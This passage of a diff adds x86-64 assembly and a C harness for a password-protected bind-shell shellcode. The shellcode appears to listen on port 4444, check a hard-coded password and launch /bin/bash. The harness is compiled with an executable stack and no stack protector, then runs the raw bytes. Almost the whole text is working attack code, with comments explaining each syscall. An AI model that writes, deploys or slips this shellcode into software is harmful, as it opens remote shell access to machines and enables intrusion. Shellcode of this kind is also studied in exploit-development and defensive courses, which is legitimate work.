+; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN +; rsi = Write to &String ; rdx = 0x12 = sizeof(String) +xor rdi, rdi +push rdi +mul rdi ; rdx =0x0 ; rax = 0x0 = write system call +mov rsi, rsp ; rsi = [RSP] = &String +add rdx, 12 ; 12 bytes / size of password +syscall + +; String = P3WP3Wl4ZerZ +; ZreZ : 5a72655a +; 4lW3PW3P : 346c573350573350 +mov rdi, rsp +xor rsi, rsi +add rsi, 0x5a72655a +push rsi +mov rsi, 0x346c573350573350 +push rsi +mov rsi, rsp ; rsi = &String +xor rcx, rcx +add rcx, 0xB +repe cmpsb +jnz failer + +;execve +; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00 +; rsi = 0x0 ; rdx = 0x0 +; "/bin/bash" +; h : 68 +; sab/nib/ : 7361622f6e69622f +xor rsi, rsi +mul rsi ; rdx&rax= 0x0 +xor rdi, rdi +push rdi +add rdx, 0x68 ; "h" +push rdx +mov rdx, 0x7361622f6e69622f ; "/bin/bas" +push rdx +xor rdx, rdx +mov rdi, rsp +mov al, 0x3b ; execve syscall +syscall ; call execve("/bin/bash", NULL, NULL) + +################################################################################ + +// Filename: shellcode.c +// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode +#include +#include + +unsigned char shellcode[] = \ +"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7" +"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68" +"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6" +"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50" +"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48" +"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23" +"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c" +"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2" +"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44" +"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57" +"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f" +"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f" +"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48" +"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9" +"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48" +"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69" +"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05"; +int main() +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file
System Command: